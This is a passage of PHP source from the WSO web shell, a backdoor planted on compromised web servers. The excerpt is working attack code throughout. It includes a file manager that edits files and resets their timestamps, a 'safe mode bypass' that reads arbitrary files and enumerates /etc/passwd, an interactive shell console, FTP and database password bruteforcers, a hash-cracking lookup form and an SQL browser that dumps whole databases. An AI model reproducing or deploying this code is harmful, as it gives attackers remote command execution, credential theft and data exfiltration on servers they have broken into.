1203 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1204 if(is_array($paths)&&@count($paths)) {
1205 foreach($paths as $item) {
1206 if(@is_dir($item)){
1207 if($path!=$item)
1208 wsoRecursiveGlob($item);
1209 } else {
1210 if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
1211 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
1212 }
1213 }
1214 }
1215 }
1216 if(@$_POST['p3'])
1217 wsoRecursiveGlob($_POST['c']);
1218 echo "</div><br><h1>Search for hash:</h1><div class=content>
1219
1220 <form method='post' target='_blank' name='hf'>
1221 <input type='text' name='hash' style='width:200px;'><br>
1222 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1223 <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
1224 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
1225 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1226 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1227 </form></div>";
1228 wsoFooter();
1229}
1230
1231function actionFilesTools() {
1232 if( isset($_POST['p1']) )
1233 $_POST['p1'] = urldecode($_POST['p1']);
1234 if(@$_POST['p2']=='download') {
1235 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
1236 ob_start("ob_gzhandler", 4096);
1237 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1238 if (function_exists("mime_content_type")) {
1239 $type = @mime_content_type($_POST['p1']);
1240 header("Content-Type: " . $type);
1241 } else
1242 header("Content-Type: application/octet-stream");
1243 $fp = @fopen($_POST['p1'], "r");
1244 if($fp) {
1245 while(!@feof($fp))
1246 echo @fread($fp, 1024);
1247 fclose($fp);
1248 }
1249 }exit;
1250 }
1251 if( @$_POST['p2'] == 'mkfile' ) {
1252 if(!file_exists($_POST['p1'])) {
1253 $fp = @fopen($_POST['p1'], 'w');
1254 if($fp) {
1255 $_POST['p2'] = "edit";
1256 fclose($fp);
1257 }
1258 }
1259 }
1260 wsoHeader();
1261 echo '<h1>File tools</h1><div class=content>';
1262 if( !file_exists(@$_POST['p1']) ) {
1263 echo 'File not exists';
1264 wsoFooter();
1265 return;
1266 }
1267 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
1268 if(!$uid) {
1269 $uid['name'] = @fileowner($_POST['p1']);
1270 $gid['name'] = @filegroup($_POST['p1']);
1271 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
1272 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1273 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1274 if( empty($_POST['p2']) )
1275 $_POST['p2'] = 'view';
1276 if( is_file($_POST['p1']) )
1277 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
1278 else
1279 $m = array('Chmod', 'Rename', 'Touch');
1280 foreach($m as $v)
1281 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1282 echo '<br><br>';
1283 switch($_POST['p2']) {
1284 case 'view':
1285 echo '<pre class=ml1>';
1286 $fp = @fopen($_POST['p1'], 'r');
1287 if($fp) {
1288 while( !@feof($fp) )
1289 echo htmlspecialchars(@fread($fp, 1024));
1290 @fclose($fp);
1291 }
1292 echo '</pre>';
1293 break;
1294 case 'highlight':
1295 if( @is_readable($_POST['p1']) ) {
1296 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1297 $code = @highlight_file($_POST['p1'],true);
1298 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
1299 }
1300 break;
1301 case 'chmod':
1302 if( !empty($_POST['p3']) ) {
1303 $perms = 0;
1304 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1305 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
1306 if(!@chmod($_POST['p1'], $perms))
1307 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1308 }
1309 clearstatcache();
1310 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1311 break;
1312 case 'edit':
1313 if( !is_writable($_POST['p1'])) {
1314 echo 'File isn\'t writeable';
1315 break;
1316 }
1317 if( !empty($_POST['p3']) ) {
1318 $time = @filemtime($_POST['p1']);
1319 $_POST['p3'] = substr($_POST['p3'],1);
1320 $fp = @fopen($_POST['p1'],"w");
1321 if($fp) {
1322 @fwrite($fp,$_POST['p3']);
1323 @fclose($fp);
1324 echo 'Saved!<br><script>p3_="";</script>';
1325 @touch($_POST['p1'],$time,$time);
1326 }
1327 }
1328 echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1329 $fp = @fopen($_POST['p1'], 'r');
1330 if($fp) {
1331 while( !@feof($fp) )
1332 echo htmlspecialchars(@fread($fp, 1024));
1333 @fclose($fp);
1334 }
1335 echo '</textarea><input type=submit value=">>"></form>';
1336 break;
1337 case 'hexdump':
1338 $c = @file_get_contents($_POST['p1']);
1339 $n = 0;
1340 $h = array('00000000<br>','','');
1341 $len = strlen($c);
1342 for ($i=0; $i<$len; ++$i) {
1343 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1344 switch ( ord($c[$i]) ) {
1345 case 0: $h[2] .= ' '; break;
1346 case 9: $h[2] .= ' '; break;
1347 case 10: $h[2] .= ' '; break;
1348 case 13: $h[2] .= ' '; break;
1349 default: $h[2] .= $c[$i]; break;
1350 }
1351 $n++;
1352 if ($n == 32) {
1353 $n = 0;
1354 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1355 $h[1] .= '<br>';
1356 $h[2] .= "\n";
1357 }
1358 }
1359 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1360 break;
1361 case 'rename':
1362 if( !empty($_POST['p3']) ) {
1363 if(!@rename($_POST['p1'], $_POST['p3']))
1364 echo 'Can\'t rename!<br>';
1365 else
1366 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1367 }
1368 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1369 break;
1370 case 'touch':
1371 if( !empty($_POST['p3']) ) {
1372 $time = strtotime($_POST['p3']);
1373 if($time) {
1374 if(!touch($_POST['p1'],$time,$time))
1375 echo 'Fail!';
1376 else
1377 echo 'Touched!';
1378 } else echo 'Bad time format!';
1379 }
1380 clearstatcache();
1381 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1382 break;
1383 }
1384 echo '</div>';
1385 wsoFooter();
1386}
1387
1388function actionSafeMode() {
1389 $temp='';
1390 ob_start();
1391 switch($_POST['p1']) {
1392 case 1:
1393 $temp=@tempnam($test, 'cx');
1394 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1395 echo @file_get_contents($temp);
1396 unlink($temp);
1397 } else
1398 echo 'Sorry... Can\'t open file';
1399 break;
1400 case 2:
1401 $files = glob($_POST['p2'].'*');
1402 if( is_array($files) )
1403 foreach ($files as $filename)
1404 echo $filename."\n";
1405 break;
1406 case 3:
1407 $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
1408 curl_exec($ch);
1409 break;
1410 case 4:
1411 ini_restore("safe_mode");
1412 ini_restore("open_basedir");
1413 include($_POST['p2']);
1414 break;
1415 case 5:
1416 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1417 $uid = @posix_getpwuid($_POST['p2']);
1418 if ($uid)
1419 echo join(':',$uid)."\n";
1420 }
1421 break;
1422 }
1423 $temp = ob_get_clean();
1424 wsoHeader();
1425 echo '<h1>Safe mode bypass</h1><div class=content>';
1426 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
1427 if($temp)
1428 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
1429 echo '</div>';
1430 wsoFooter();
1431}
1432
1433function actionConsole() {
1434 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
1435 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
1436 $_POST['p1'] .= ' 2>&1';
1437 } elseif(!empty($_POST['p1']))
1438 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
1439
1440 if(isset($_POST['ajax'])) {
1441 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1442 ob_start();
1443 echo "d.cf.cmd.value='';\n";
1444 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
1445 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1446 if(@chdir($match[1])) {
1447 $GLOBALS['cwd'] = @getcwd();
1448 echo "c_='".$GLOBALS['cwd']."';";
1449 }
1450 }
1451 echo "d.cf.output.value+='".$temp."';";
1452 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
1453 $temp = ob_get_clean();
1454 echo strlen($temp), "\n", $temp;
1455 exit;
1456 }
1457 wsoHeader();
1458 echo "<script>
1459if(window.Event) window.captureEvents(Event.KEYDOWN);
1460var cmds = new Array('');
1461var cur = 0;
1462function kp(e) {
1463 var n = (window.Event) ? e.which : e.keyCode;
1464 if(n == 38) {
1465 cur--;
1466 if(cur>=0)
1467 document.cf.cmd.value = cmds[cur];
1468 else
1469 cur++;
1470 } else if(n == 40) {
1471 cur++;
1472 if(cur < cmds.length)
1473 document.cf.cmd.value = cmds[cur];
1474 else
1475 cur--;
1476 }
1477}
1478function add(cmd) {
1479 cmds.pop();
1480 cmds.push(cmd);
1481 cmds.push('');
1482 cur = cmds.length-1;
1483}
1484
1485</script>";
1486 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
1487 foreach($GLOBALS['aliases'] as $n => $v) {
1488 if($v == '') {
1489 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1490 continue;
1491 }
1492 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1493 }
1494 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1495 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1496 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1497 if(!empty($_POST['p1'])) {
1498 echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
1499 }
1500 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1501 echo '</form></div><script>d.cf.cmd.focus();</script>';
1502 wsoFooter();
1503}
1504
1505function actionLogout() {
1506 session_destroy();
1507 die('bye!');
1508}
1509
1510function actionSelfRemove() {
1511
1512 if($_POST['p1'] == 'yes')
1513 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1514 die('Shell has been removed');
1515 else
1516 echo 'unlink error!';
1517 if($_POST['p1'] != 'yes')
1518 wsoHeader();
1519 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1520 wsoFooter();
1521}
1522
1523function actionBruteforce() {
1524 wsoHeader();
1525 if( isset($_POST['proto']) ) {
1526 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1527 if( $_POST['proto'] == 'ftp' ) {
1528 function bruteForce($ip,$port,$login,$pass) {
1529 $fp = @ftp_connect($ip, $port?$port:21);
1530 if(!$fp) return false;
1531 $res = @ftp_login($fp, $login, $pass);
1532 @ftp_close($fp);
1533 return $res;
1534 }
1535 } elseif( $_POST['proto'] == 'mysql' ) {
1536 function bruteForce($ip,$port,$login,$pass) {
1537 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1538 @mysql_close($res);
1539 return $res;
1540 }
1541 } elseif( $_POST['proto'] == 'pgsql' ) {
1542 function bruteForce($ip,$port,$login,$pass) {
1543 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1544 $res = @pg_connect($str);
1545 @pg_close($res);
1546 return $res;
1547 }
1548 }
1549 $success = 0;
1550 $attempts = 0;
1551 $server = explode(":", $_POST['server']);
1552 if($_POST['type'] == 1) {
1553 $temp = @file('/etc/passwd');
1554 if( is_array($temp) )
1555 foreach($temp as $line) {
1556 $line = explode(":", $line);
1557 ++$attempts;
1558 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1559 $success++;
1560 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1561 }
1562 if(@$_POST['reverse']) {
1563 $tmp = "";
1564 for($i=strlen($line[0])-1; $i>=0; --$i)
1565 $tmp .= $line[0][$i];
1566 ++$attempts;
1567 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1568 $success++;
1569 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1570 }
1571 }
1572 }
1573 } elseif($_POST['type'] == 2) {
1574 $temp = @file($_POST['dict']);
1575 if( is_array($temp) )
1576 foreach($temp as $line) {
1577 $line = trim($line);
1578 ++$attempts;
1579 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1580 $success++;
1581 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1582 }
1583 }
1584 }
1585 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1586 }
1587 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1588 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1589 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1590 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1591 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1592 .'<span>Server:port</span></td>'
1593 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1594 .'<tr><td><span>Brute type</span></td>'
1595 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1596 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1597 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1598 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1599 .'<td><input type=text name=login value="root"></td></tr>'
1600 .'<tr><td><span>Dictionary</span></td>'
1601 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1602 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1603 echo '</div><br>';
1604 wsoFooter();
1605}
1606
1607function actionSql() {
1608 class DbClass {
1609 var $type;
1610 var $link;
1611 var $res;
1612 function DbClass($type) {
1613 $this->type = $type;
1614 }
1615 function connect($host, $user, $pass, $dbname){
1616 switch($this->type) {
1617 case 'mysql':
1618 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1619 break;
1620 case 'pgsql':
1621 $host = explode(':', $host);
1622 if(!$host[1]) $host[1]=5432;
1623 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1624 break;
1625 }
1626 return false;
1627 }
1628 function selectdb($db) {
1629 switch($this->type) {
1630 case 'mysql':
1631 if (@mysql_select_db($db))return true;
1632 break;
1633 }
1634 return false;
1635 }
1636 function query($str) {
1637 switch($this->type) {
1638 case 'mysql':
1639 return $this->res = @mysql_query($str);
1640 break;
1641 case 'pgsql':
1642 return $this->res = @pg_query($this->link,$str);
1643 break;
1644 }
1645 return false;
1646 }
1647 function fetch() {
1648 $res = func_num_args()?func_get_arg(0):$this->res;
1649 switch($this->type) {
1650 case 'mysql':
1651 return @mysql_fetch_assoc($res);
1652 break;
1653 case 'pgsql':
1654 return @pg_fetch_assoc($res);
1655 break;
1656 }
1657 return false;
1658 }
1659 function listDbs() {
1660 switch($this->type) {
1661 case 'mysql':
1662 return $this->query("SHOW databases");
1663 break;
1664 case 'pgsql':
1665 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1666 break;
1667 }
1668 return false;
1669 }
1670 function listTables() {
1671 switch($this->type) {
1672 case 'mysql':
1673 return $this->res = $this->query('SHOW TABLES');
1674 break;
1675 case 'pgsql':
1676 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1677 break;
1678 }
1679 return false;
1680 }
1681 function error() {
1682 switch($this->type) {
1683 case 'mysql':
1684 return @mysql_error();
1685 break;
1686 case 'pgsql':
1687 return @pg_last_error();
1688 break;
1689 }
1690 return false;
1691 }
1692 function setCharset($str) {
1693 switch($this->type) {
1694 case 'mysql':
1695 if(function_exists('mysql_set_charset'))
1696 return @mysql_set_charset($str, $this->link);
1697 else
1698 $this->query('SET CHARSET '.$str);
1699 break;
1700 case 'pgsql':
1701 return @pg_set_client_encoding($this->link, $str);
1702 break;
1703 }
1704 return false;
1705 }
1706 function loadFile($str) {
1707 switch($this->type) {
1708 case 'mysql':
1709 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1710 break;
1711 case 'pgsql':
1712 $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1713 $r=array();
1714 while($i=$this->fetch())
1715 $r[] = $i['file'];
1716 $this->query('drop table wso2');
1717 return array('file'=>implode("\n",$r));
1718 break;
1719 }
1720 return false;
1721 }
1722 function dump($table, $fp = false) {
1723 switch($this->type) {
1724 case 'mysql':
1725 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1726 $create = mysql_fetch_array($res);
1727 $sql = $create[1].";\n";
1728 if($fp) fwrite($fp, $sql); else echo($sql);
1729 $this->query('SELECT * FROM `'.$table.'`');
1730 $head = true;
1731 while($item = $this->fetch()) {
1732 $columns = array();
1733 foreach($item as $k=>$v) {
1734 if($v == null)
1735 $item[$k] = "NULL";
1736 elseif(is_numeric($v))
1737 $item[$k] = $v;
1738 else
1739 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1740 $columns[] = "`".$k."`";
1741 }
1742 if($head) {
1743 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1744 $head = false;
1745 } else
1746 $sql = "\n\t,(".implode(", ", $item).')';
1747 if($fp) fwrite($fp, $sql); else echo($sql);
1748 }
1749 if(!$head)
1750 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1751 break;
1752 case 'pgsql':
1753 $this->query('SELECT * FROM '.$table);
1754 while($item = $this->fetch()) {
1755 $columns = array();
1756 foreach($item as $k=>$v) {
1757 $item[$k] = "'".addslashes($v)."'";
1758 $columns[] = $k;
1759 }
1760 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1761 if($fp) fwrite($fp, $sql); else echo($sql);
1762 }
1763 break;
1764 }
1765 return false;
1766 }
1767 };
1768 $db = new DbClass($_POST['type']);
1769 if(@$_POST['p2']=='download') {
1770 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1771 $db->selectdb($_POST['sql_base']);
1772 switch($_POST['charset']) {
1773 case "Windows-1251": $db->setCharset('cp1251'); break;
1774 case "UTF-8": $db->setCharset('utf8'); break;
1775 case "KOI8-R": $db->setCharset('koi8r'); break;
1776 case "KOI8-U": $db->setCharset('koi8u'); break;
1777 case "cp866": $db->setCharset('cp866'); break;
1778 }
1779 if(empty($_POST['file'])) {
1780 ob_start("ob_gzhandler", 4096);
1781 header("Content-Disposition: attachment; filename=dump.sql");
1782 header("Content-Type: text/plain");
1783 foreach($_POST['tbl'] as $v)
1784 $db->dump($v);
1785 exit;
1786 } elseif($fp = @fopen($_POST['file'], 'w')) {
1787 foreach($_POST['tbl'] as $v)
1788 $db->dump($v, $fp);
1789 fclose($fp);
1790 unset($_POST['p2']);
1791 } else
1792 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1793 }
1794 wsoHeader();
1795 echo "
1796
1797<h1>Sql browser</h1><div class=content>
1798<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1799<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1800<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1801<td><select name='type'><option value='mysql' ";
1802 if(@$_POST['type']=='mysql')echo 'selected';
1803echo ">MySql</option><option value='pgsql' ";
1804if(@$_POST['type']=='pgsql')echo 'selected';
1805echo ">PostgreSql</option></select></td>
1806<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1807<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1808<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1809 $tmp = "<input type=text name=sql_base value=''>";
1810 if(isset($_POST['sql_host'])){
1811 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1812 switch($_POST['charset']) {
1813 case "Windows-1251": $db->setCharset('cp1251'); break;
1814 case "UTF-8": $db->setCharset('utf8'); break;
1815 case "KOI8-R": $db->setCharset('koi8r'); break;
1816 case "KOI8-U": $db->setCharset('koi8u'); break;
1817 case "cp866": $db->setCharset('cp866'); break;
1818 }
1819 $db->listDbs();
1820 echo "<select name=sql_base><option value=''></option>";
1821 while($item = $db->fetch()) {
1822 list($key, $value) = each($item);
1823 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1824 }
1825 echo '</select>';
1826 }
1827 else echo $tmp;
1828 }else
1829 echo $tmp;
1830 echo "</td>
1831
1832 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1833 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1834 </tr>
1835 </table>
1836 <script>
1837 s_db='".@addslashes($_POST['sql_base'])."';
1838 function fs(f) {
1839 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1840 if(f.p1) f.p1.value='';
1841 if(f.p2) f.p2.value='';
1842 if(f.p3) f.p3.value='';
1843 }
1844 }
1845 function st(t,l) {
1846 d.sf.p1.value = 'select';
1847 d.sf.p2.value = t;
1848 if(l && d.sf.p3) d.sf.p3.value = l;
1849 d.sf.submit();
1850 }
1851 function is() {
1852 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1853 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1854 }
1855 </script>";
1856 if(isset($db) && $db->link){
1857 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1858 if(!empty($_POST['sql_base'])){
1859 $db->selectdb($_POST['sql_base']);
1860 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1861 $tbls_res = $db->listTables();
1862 while($item = $db->fetch($tbls_res)) {
1863 list($key, $value) = each($item);
1864 if(!empty($_POST['sql_count']))
1865 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1866 $value = htmlspecialchars($value);
1867 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
1868 }
1869 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1870 if(@$_POST['p1'] == 'select') {
1871 $_POST['p1'] = 'query';
1872 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1873 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1874 $num = $db->fetch();
1875 $pages = ceil($num['n'] / 30);
1876 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1877 echo " of $pages";
1878 if($_POST['p3'] > 1)
1879 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1880 if($_POST['p3'] < $pages)
1881 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1882 $_POST['p3']--;
1883 if($_POST['type']=='pgsql')
1884 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1885 else
1886 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1887 echo "<br><br>";
1888 }
1889 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1890 $db->query(@$_POST['p2']);
1891 if($db->res !== false) {
1892 $title = false;
1893 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1894 $line = 1;
1895 while($item = $db->fetch()) {
1896 if(!$title) {
1897 echo '<tr>';
1898 foreach($item as $key => $value)
1899 echo '<th>'.$key.'</th>';
1900 reset($item);
1901 $title=true;
1902 echo '</tr><tr>';
1903 $line = 2;
1904 }
1905 echo '<tr class="l'.$line.'">';
1906 $line = $line==1?2:1;
1907 foreach($item as $key => $value) {
1908 if($value == null)
1909 echo '<td><i>null</i></td>';
1910 else
1911 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1912 }
1913 echo '</tr>';
1914 }
1915 echo '</table>';
1916 } else {
1917 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1918 }
1919 }
